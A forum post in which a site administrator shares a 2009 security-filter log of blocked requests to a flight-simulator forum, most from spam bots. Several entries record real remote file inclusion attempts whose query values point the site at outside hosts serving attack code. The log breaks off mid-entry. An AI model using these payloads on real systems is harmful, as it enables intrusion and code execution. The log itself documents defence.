I use to log every move these bots made until i got my new security file installed, below is a 2 year old file of such events. You will see all the BS I had to endure, lol.
They never stop!
#: 2 @: Wed, 09 Dec 2009 20:25:08 -0500
Host: cm222-166-160-206.hkcable.com.hk
IP: 222.166.160.206
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.bestdrugsworld.com
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php
#: 3 @: Wed, 09 Dec 2009 20:29:11 -0500
Host: adamidispowerfruits.com
IP: 66.197.221.159
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/sohforums/register.php?
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 4 @: Wed, 09 Dec 2009 20:53:44 -0500
Host: pc-93-35-46-190.cm.vtr.net
IP: 190.46.35.93
Score: 1
Why blocked: Bothost and/or Server Farm (weird!).
Query: t=20949
Referer:
http://images.google.cl/imgres?imgu...+long+haul&gbv=2&ndsp=18&hl=es&sa=n&start=180
User Agent: Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.2.15 Version/10.10
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=20949
#: 5 @: Wed, 09 Dec 2009 20:55:45 -0500
Host: 28-59-179-94.pool.ukrtel.net
IP: 94.179.59.28
Score: 1
Why blocked: ukrtel, forum spambots.
Query: loc=links&page=add_link
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Reconstructed URL: http://
www.sim-outhouse.com /index.php?loc=links&page=add_link
#: 6 @: Wed, 09 Dec 2009 20:56:15 -0500
Host: 28-59-179-94.pool.ukrtel.net
IP: 94.179.59.28
Score: 1
Why blocked: ukrtel, forum spambots.
Query:
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Reconstructed URL: http://
www.sim-outhouse.com /
#: 7 @: Wed, 09 Dec 2009 20:58:04 -0500
Host: pc-93-35-46-190.cm.vtr.net
IP: 190.46.35.93
Score: 1
Why blocked: Bothost and/or Server Farm (weird!).
Query: t=20949
Referer:
http://images.google.cl/imgres?imgu...+long+haul&gbv=2&ndsp=18&hl=es&sa=n&start=216
User Agent: Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.2.15 Version/10.10
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=20949
#: 8 @: Wed, 09 Dec 2009 21:14:09 -0500
Host: 201-34-244-151.cbace700.dsl.brasiltelecom.net.br
IP: 201.34.244.151
Score: 2
Why blocked: Question mark at end of query. RFI (http). .
Query: f=http://217.218.225.2:2082/index.html?
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=http://217.218.225.2:2082/index.html?
#: 9 @: Wed, 09 Dec 2009 21:24:24 -0500
Host: 201-34-244-151.cbace700.dsl.brasiltelecom.net.br
IP: 201.34.244.151
Score: 2
Why blocked: Question mark at end of query. RFI (http). .
Query: f=http://217.218.225.2:2082/index.html?
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=http://217.218.225.2:2082/index.html?
#: 10 @: Wed, 09 Dec 2009 21:24:39 -0500
Host: 201-34-244-151.cbace700.dsl.brasiltelecom.net.br
IP: 201.34.244.151
Score: 2
Why blocked: Question mark at end of query. RFI (http). .
Query: f=http://217.218.225.2:2082/index.html?
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=http://217.218.225.2:2082/index.html?
#: 11 @: Wed, 09 Dec 2009 21:25:20 -0500
Host: 66-88-5-80.static.virginmedia.com
IP: 80.5.88.66
Score: 1
Why blocked: Robot Probe (modsecurity.org).
Query:
Referer:
User Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
Reconstructed URL: http://
www.sim-outhouse.com /
#: 12 @: Wed, 09 Dec 2009 21:32:08 -0500
Host: cable201-232-186-189.epm.net.co
IP: 201.232.186.189
Score: 1
Why blocked: Bothost and/or Server Farm.
Query: t=27277
Referer:
http://www.google.com.co/search?hl=es&q=basler+bt-67+para+fs2004&btng=buscar&meta=&aq=f&oq=
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=27277
#: 13 @: Wed, 09 Dec 2009 21:32:08 -0500
Host: 195.208.8.235
IP: 195.208.8.235
Score: 3
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . . HTTP_REFERER pollution of serverlogs with spam ad word -24h., we don't link from there. HTTP_REFERER pollution of serverlogs with spam ads ad word cigar, we don't link from there.
Query:
Referer:
www.cheap-24h.com/magna-cigarettes/magna-balanced-blue-cigarettes
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php
#: 14 @: Wed, 09 Dec 2009 21:32:20 -0500
Host: cable201-232-186-189.epm.net.co
IP: 201.232.186.189
Score: 1
Why blocked: Bothost and/or Server Farm.
Query: t=27277
Referer:
http://www.google.com.co/search?hl=es&q=basler+bt-67+para+fs2004&btng=buscar&meta=&aq=f&oq=
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=27277
#: 15 @: Wed, 09 Dec 2009 21:32:57 -0500
Host: ip70-173-175-177.lv.lv.cox.net
IP: 70.173.175.177
Score: 1
Why blocked: Your computer is infected with spyware/mail.ru_agent . Go to
http://www.safer-networking.org and get Spybot Search & Destroy, clean your machine, then come back.
Query:
Referer:
http://www.espnnn.com
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/index.php
#: 16 @: Wed, 09 Dec 2009 21:33:10 -0500
Host: c-71-196-34-92.hsd1.fl.comcast.net
IP: 71.196.34.92
Score: 2
Why blocked: HTTP_REFERER pollution of serverlogs with spam ad word -24h., we don't link from there. HTTP_REFERER pollution of serverlogs with spam ads ad word cigar, we don't link from there.
Query:
Referer:
www.cheap-24h.com/magna-cigarettes/magna-balanced-blue-cigarettes
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)
Reconstructed URL: http://
www.sim-outhouse.com /
#: 17 @: Wed, 09 Dec 2009 21:33:17 -0500
Host: ip70-173-175-177.lv.lv.cox.net
IP: 70.173.175.177
Score: 1
Why blocked: Your computer is infected with spyware/mail.ru_agent . Go to
http://www.safer-networking.org and get Spybot Search & Destroy, clean your machine, then come back.
Query:
Referer:
http://www.sim-outhouse.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))
Reconstructed URL: http://
www.sim-outhouse.com /
#: 18 @: Wed, 09 Dec 2009 21:35:37 -0500
Host: ec2-75-101-206-78.compute-1.amazonaws.com
IP: 75.101.206.78
Score: 1
Why blocked: Amazon Web Services. Not an ISP. Used by hackers, Keyword spamming SEO bots, and other unsavories. Checked for bypass.
Query: type=RSS2
Referer:
User Agent: Mozilla/5.0 (compatible; TopBlogsInfo/2.0;
+topblogsinfo@gmail.com)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/external.php?type=RSS2
#: 19 @: Wed, 09 Dec 2009 21:37:05 -0500
Host: ec2-75-101-206-78.compute-1.amazonaws.com
IP: 75.101.206.78
Score: 1
Why blocked: Amazon Web Services. Not an ISP. Used by hackers, Keyword spamming SEO bots, and other unsavories. Checked for bypass.
Query: type=RSS2
Referer:
User Agent: Mozilla/5.0 (compatible; TopBlogsInfo/2.0;
+topblogsinfo@gmail.com)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/external.php?type=RSS2
#: 20 @: Wed, 09 Dec 2009 21:41:04 -0500
Host: adsl190-29-134-95.une.net.co
IP: 190.29.134.95
Score: 1
Why blocked: Bothost and/or Server Farm.
Query: t=20813
Referer:
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=20813
#: 21 @: Wed, 09 Dec 2009 21:41:11 -0500
Host: adsl190-29-134-95.une.net.co
IP: 190.29.134.95
Score: 1
Why blocked: Bothost and/or Server Farm.
Query: t=20813
Referer:
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=20813
#: 22 @: Wed, 09 Dec 2009 21:42:58 -0500
Host: vps94-13.elaninet.com
IP: 78.26.187.127
Score: 2
Why blocked: Windows 95 is unusable. RBN.
Query: f=44
Referer:
http://www.sim-outhouse.com/sohforums/forumdisplay.php?f=44
User Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=44
#: 23 @: Wed, 09 Dec 2009 21:45:52 -0500
Host: pc150-162.upce.cz
IP: 78.128.150.162
Score: 1
Why blocked: Windows 95 is unusable.
Query: f=5&styleid=9
Referer:
http://www.sim-outhouse.com/sohforums/forumdisplay.php?f=5&styleid=9
User Agent: Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=5&styleid=9
#: 24 @: Wed, 09 Dec 2009 21:46:37 -0500
Host: pc150-162.upce.cz
IP: 78.128.150.162
Score: 1
Why blocked: Windows 95 is unusable.
Query:
Referer:
http://www.sim-outhouse.com/sohforums/forumdisplay.php?f=5&styleid=9
User Agent: Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)
Reconstructed URL: http://
www.sim-outhouse.com /
#: 25 @: Wed, 09 Dec 2009 21:47:03 -0500
Host: static-208-80-193-27.as13448.com
IP: 208.80.193.27
Score: 1
Why blocked: Forum spamming bot, real announces as "AOL".
Query: p=534918
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; FunWebProducts; SU 2.010; .NET CLR 1.1.4322)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?p=534918
#: 26 @: Wed, 09 Dec 2009 22:18:28 -0500
Host: 239-42-179-94.pool.ukrtel.net
IP: 94.179.42.239
Score: 1
Why blocked: ukrtel, forum spambots.
Query: p=306426
Referer:
http://www.sim-outhouse.com/sohforums/showthread.php?p=306426
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?p=306426
#: 27 @: Wed, 09 Dec 2009 22:18:50 -0500
Host: 239-42-179-94.pool.ukrtel.net
IP: 94.179.42.239
Score: 1
Why blocked: ukrtel, forum spambots.
Query:
Referer:
http://www.sim-outhouse.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01
Reconstructed URL: http://
www.sim-outhouse.com /
#: 28 @: Wed, 09 Dec 2009 22:45:30 -0500
Host: 176.124.33.65.cfl.res.rr.com
IP: 65.33.124.176
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/register.php?
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 29 @: Wed, 09 Dec 2009 22:45:58 -0500
Host: 119.12.21.10
IP: 119.12.21.10
Score: 2
Why blocked: Your computer is infected with spyware/mail.ru_agent . Go to
http://www.safer-networking.org and get Spybot Search & Destroy, clean your machine, then come back. Nogoodnik nekulturny mail.ru forum spamming bot.
Query: threadid=17616
Referer:
http://www.google.com.au/search?hl=en&q=muha+scenery+for+fs2004&meta=&aq=f&oq=
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MRSPUTNIK 1, 8, 0, 17 HW; MRA 4.10 (build 01952); .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; [xSP_2:000462bcb58821c033d9de1d8ba0a42a_139]; 976902999903)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?threadid=17616
#: 30 @: Wed, 09 Dec 2009 22:46:41 -0500
Host: ip-174-142-120-148.static.privatedns.com
IP: 174.142.120.148
Score: 7
Why blocked: Question mark at end of query. Badly formed query, must not have 2 question marks in a row. RFI (http). Path hack. Nesting attack. No www site, and several attacks. Bothost and/or Server Farm. .
Query: do=findus...6204&searchthreadid=23977%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://standardcan.com/test/persona/fid1.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/search.php?do=findus...6204&searchthreadid=23977%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://standardcan.com/test/persona/fid1.txt??
#: 31 @: Wed, 09 Dec 2009 23:09:46 -0500
Host: cmu1-118-111-245-187.aic.mesh.ad.jp
IP: 118.111.245.187
Score: 1
Why blocked: Advertising only addresses.
Query: loc=graham&page=category&cat=German
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Reconstructed URL: http://
www.sim-outhouse.com /index.php?loc=graham&page=category&cat=German
#: 32 @: Wed, 09 Dec 2009 23:32:36 -0500
Host: adsl-156-75-188.msy.bellsouth.net
IP: 70.156.75.188
Score: 2
Why blocked: Question mark at end of query. RFI (http). .
Query: page=http://217.218.225.2:2082/index.html?
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /index.php?page=http://217.218.225.2:2082/index.html?
#: 33 @: Wed, 09 Dec 2009 23:33:51 -0500
Host: pwasce-krasky.atl.sa.earthlink.net
IP: 209.86.226.16
Score: 1
Why blocked: Nesting attack.
Query: loc=fswarbirds/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=384
Referer:
http://www.sim-outhouse.com/index.php?loc=fswarbirds/pages&page=downloads_fs2k4
User Agent:
Reconstructed URL: http://
www.sim-outhouse.com /index.php?loc=fswarbirds/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=384
#: 34 @: Wed, 09 Dec 2009 23:34:19 -0500
Host: 94.102.63.60
IP: 94.102.63.60
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/sohforums/register.php
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php
#: 35 @: Wed, 09 Dec 2009 23:40:51 -0500
Host: 217.11.187.12
IP: 217.11.187.12
Score: 1
Why blocked: Your computer is infected with spyware/mail.ru_agent . Go to
http://www.safer-networking.org and get Spybot Search & Destroy, clean your machine, then come back.
Query: t=18881&page=2
Referer:
http://images.google.ru/imgres?imgu...gbv=2&ndsp=18&hl=ru&sa=n&start=72&newwindow=1
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.15) Gecko/2009101601 MRA 5.5 (build 02842) Firefox/3.0.15 sputnik unknown
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=18881&page=2
#: 36 @: Wed, 09 Dec 2009 23:40:59 -0500
Host: 217.11.187.12
IP: 217.11.187.12
Score: 1
Why blocked: Your computer is infected with spyware/mail.ru_agent . Go to
http://www.safer-networking.org and get Spybot Search & Destroy, clean your machine, then come back.
Query: t=18881&page=2
Referer:
http://images.google.ru/imgres?imgu...gbv=2&ndsp=18&hl=ru&sa=n&start=72&newwindow=1
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.15) Gecko/2009101601 MRA 5.5 (build 02842) Firefox/3.0.15 sputnik unknown
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=18881&page=2
#: 37 @: Wed, 09 Dec 2009 23:41:01 -0500
Host: 217.11.187.12
IP: 217.11.187.12
Score: 1
Why blocked: Your computer is infected with spyware/mail.ru_agent . Go to
http://www.safer-networking.org and get Spybot Search & Destroy, clean your machine, then come back.
Query: t=18881&page=2
Referer:
http://images.google.ru/imgres?imgu...gbv=2&ndsp=18&hl=ru&sa=n&start=72&newwindow=1
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.15) Gecko/2009101601 MRA 5.5 (build 02842) Firefox/3.0.15 sputnik unknown
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=18881&page=2
#: 38 @: Wed, 09 Dec 2009 23:51:41 -0500
Host: 95.215.0.37
IP: 95.215.0.37
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/sohforums/register.php
User Agent: Opera/9.00 (Windows NT 5.1; U; en)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php
#: 39 @: Wed, 09 Dec 2009 23:52:30 -0500
Host: 188.92.75.221
IP: 188.92.75.221
Score: 1
Why blocked: adtechnology.lv spammers.
Query:
Referer:
http://www.sim-outhouse.com/sohforums/index.php
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/index.php
#: 40 @: Wed, 09 Dec 2009 23:53:15 -0500
Host: 188.92.75.221
IP: 188.92.75.221
Score: 1
Why blocked: adtechnology.lv spammers.
Query:
Referer:
http://www.sim-outhouse.com/sohforums/index.php
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
Reconstructed URL: http://
www.sim-outhouse.com /
#: 41 @: Wed, 09 Dec 2009 23:59:27 -0500
Host: static-98-141-189-167.dsl.cavtel.net
IP: 98.141.189.167
Score: 2
Why blocked: Question mark at end of query. RFI (http). .
Query: loc=http://217.218.225.2:2082/index.html?
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /index.php?loc=http://217.218.225.2:2082/index.html?
#: 42 @: Wed, 09 Dec 2009 23:59:42 -0500
Host: static-98-141-189-167.dsl.cavtel.net
IP: 98.141.189.167
Score: 2
Why blocked: Question mark at end of query. RFI (http). .
Query: loc=http://217.218.225.2:2082/index.html?
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /index.php?loc=http://217.218.225.2:2082/index.html?
#: 43 @: Thu, 10 Dec 2009 00:00:59 -0500
Host: 18-180.228.popsite.net
IP: 66.217.88.180
Score: 1
Why blocked: ISP with a filthy reputation.
Query: lloc=downloads&loc=downloads&page=downloads&FileType=all&ammm=100&pap=47
Referer:
http://www.google.com/search?hl=en&...ures+of+ml-knil+c-47+transports&start=30&sa=n
User Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12
Reconstructed URL: http://
www.sim-outhouse.com /index.php?lloc=downloads&loc=downloads&page=downloads&FileType=all&ammm=100&pap=47
#: 44 @: Thu, 10 Dec 2009 00:15:17 -0500
Host: bc2-rba-1-0.cache.isnet.net
IP: 196.35.158.183
Score: 1
Why blocked: South African Bothosts.
Query:
Referer:
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090331 K-Meleon/1.5.3
Reconstructed URL: http://
www.sim-outhouse.com /
#: 45 @: Thu, 10 Dec 2009 00:15:33 -0500
Host: cmu1-118-111-247-190.aic.mesh.ad.jp
IP: 118.111.247.190
Score: 1
Why blocked: Advertising only addresses.
Query: loc=graham&page=category&cat=German
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Reconstructed URL: http://
www.sim-outhouse.com /index.php?loc=graham&page=category&cat=German
#: 46 @: Thu, 10 Dec 2009 00:16:37 -0500
Host: cmu1-118-111-247-190.aic.mesh.ad.jp
IP: 118.111.247.190
Score: 1
Why blocked: Advertising only addresses.
Query:
Referer:
http://www.combatfs.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Reconstructed URL: http://
www.sim-outhouse.com /
#: 47 @: Thu, 10 Dec 2009 00:17:13 -0500
Host: cmu1-118-111-247-190.aic.mesh.ad.jp
IP: 118.111.247.190
Score: 1
Why blocked: Advertising only addresses.
Query: threadid=862
Referer:
http://www.combatfs.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?threadid=862
#: 48 @: Thu, 10 Dec 2009 00:35:29 -0500
Host: 213.21.47.51
IP: 213.21.47.51
Score: 1
Why blocked: Windows 95 is unusable.
Query: f=44
Referer:
http://www.sim-outhouse.com/sohforums/forumdisplay.php?f=44
User Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=44
#: 49 @: Thu, 10 Dec 2009 00:36:14 -0500
Host: 213.21.47.51
IP: 213.21.47.51
Score: 1
Why blocked: Windows 95 is unusable.
Query:
Referer:
http://www.sim-outhouse.com/sohforums/forumdisplay.php?f=44
User Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]
Reconstructed URL: http://
www.sim-outhouse.com /
#: 50 @: Thu, 10 Dec 2009 00:36:59 -0500
Host: 213.21.47.51
IP: 213.21.47.51
Score: 1
Why blocked: Windows 95 is unusable.
Query: f=44
Referer:
http://www.sim-outhouse.com/sohforums/forumdisplay.php?f=44
User Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=44
#: 51 @: Thu, 10 Dec 2009 00:48:40 -0500
Host: 94.102.51.196
IP: 94.102.51.196
Score: 1
Why blocked: RBN.
Query:
Referer:
http://www.sim-outhouse.com/index.php
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /index.php
#: 52 @: Thu, 10 Dec 2009 01:31:55 -0500
Host: s0106000bdb543299.cg.shawcable.net
IP: 24.66.63.92
Score: 2
Why blocked: Question mark at end of query. RFI (http). .
Query: f=http://217.218.225.2:2082/index.html?
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=http://217.218.225.2:2082/index.html?
#: 53 @: Thu, 10 Dec 2009 01:38:42 -0500
Host: vps94-6.elaninet.com
IP: 78.26.187.120
Score: 2
Why blocked: Robot Probe. RBN.
Query:
Referer:
http://www.sim-outhouse.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)
Reconstructed URL: http://
www.sim-outhouse.com /
#: 54 @: Thu, 10 Dec 2009 01:39:29 -0500
Host: vps94-6.elaninet.com
IP: 78.26.187.120
Score: 2
Why blocked: Robot Probe. RBN.
Query:
Referer:
http://www.sim-outhouse.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)
Reconstructed URL: http://
www.sim-outhouse.com /
#: 55 @: Thu, 10 Dec 2009 02:06:31 -0500
Host: 218-169-199-70.dynamic.hinet.net
IP: 218.169.199.70
Score: 1
Why blocked: Ridin' dirty Chinese ISP.
Query: t=17099
Referer:
http://www.google.com.tw/search?hl=zh-tw&q=enbpalette&start=10&sa=n
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=17099
#: 56 @: Thu, 10 Dec 2009 02:07:12 -0500
Host: 218-169-199-70.dynamic.hinet.net
IP: 218.169.199.70
Score: 1
Why blocked: Ridin' dirty Chinese ISP.
Query: t=17099
Referer:
http://www.google.com.tw/search?hl=zh-tw&q=enbpalette&start=10&sa=n
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=17099
#: 57 @: Thu, 10 Dec 2009 02:09:16 -0500
Host: ip-188-112-151-198.ngn.lv
IP: 188.112.151.198
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/register.php?
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 58 @: Thu, 10 Dec 2009 02:09:39 -0500
Host: ip-188-112-151-198.ngn.lv
IP: 188.112.151.198
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/sohforums/register.php?
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 59 @: Thu, 10 Dec 2009 02:10:36 -0500
Host: cpe-76-174-234-119.socal.res.rr.com
IP: 76.174.234.119
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/sohforums/register.php?
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 60 @: Thu, 10 Dec 2009 02:10:56 -0500
Host: cpe-76-174-234-119.socal.res.rr.com
IP: 76.174.234.119
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/register.php?
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 61 @: Thu, 10 Dec 2009 02:11:16 -0500
Host: cpe-76-174-234-119.socal.res.rr.com
IP: 76.174.234.119
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/sohforums/register.php?
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 62 @: Thu, 10 Dec 2009 02:59:04 -0500
Host: ws211-129.maryno.net
IP: 81.88.211.129
Score: 1
Why blocked: Robot Probe (modsecurity.org).
Query:
Referer:
User Agent: Mozilla/3.0 (compatible; Indy Library)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/index.php
#: 63 @: Thu, 10 Dec 2009 03:06:05 -0500
Host: n219077034016.netvigator.com
IP: 219.77.34.16
Score: 1
Why blocked: Ridin' dirty, referer spam.
Query: f=5&order=desc&page=3
Referer:
